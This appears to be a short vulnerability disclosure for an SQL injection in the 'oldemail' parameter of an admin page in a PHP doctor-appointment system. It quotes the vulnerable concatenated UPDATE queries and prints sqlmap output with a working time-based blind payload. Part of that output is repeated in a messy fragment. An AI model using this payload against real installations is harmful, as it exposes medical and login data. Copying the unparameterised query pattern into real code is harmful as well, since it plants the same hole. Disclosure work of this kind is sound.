

SQL injection vulnerability exists in oldmail parameter of /admin/edit-doc.php file of edoc doctor appointment system

Important user data or system data may be leaked and system security may be compromised

The environment is secure and the information can be used by malicious users.

```
$sql1="update doctor set docemail='$email',docname='$name',docpassword='$password',docnic='$nic',doctel='$tele',specialties=$spec where docid=$id ;";
$database->query($sql1);

$sql1="update webuser set email='$email' where email='$oldemail' ;";
$database->query($sql1);
```

```
sqlmap identified the following injection point(s) with a total of 1124 HTTP(s) requests:
---
Parameter: oldemail (POST)
  Type: time-based blind
  Title: MySQL >= 5.0.12 RLIKE time-based blind
  Payload: id00=1&oldemail=doctor@edoc.com' RLIKE SLEEP(5)-- ZZpV&email=123@123com&name=123&nic=123&Tele=123123123123&spec=1&password=123123&cpassword=123123
---
```

“

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Type: time-based blind

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Payload: id00=1&oldemail=doctor@edoc.com' RLIKE SLEEP(5)--

ZZpV&email=123@123com&name=123&nic=123&Tele=123123123123&spec=1&password=123123&cpassword=123123

“

Source Download:

<https://www.sourcecodester.com/hashenuudara/simple-doctors-appointment-project.html>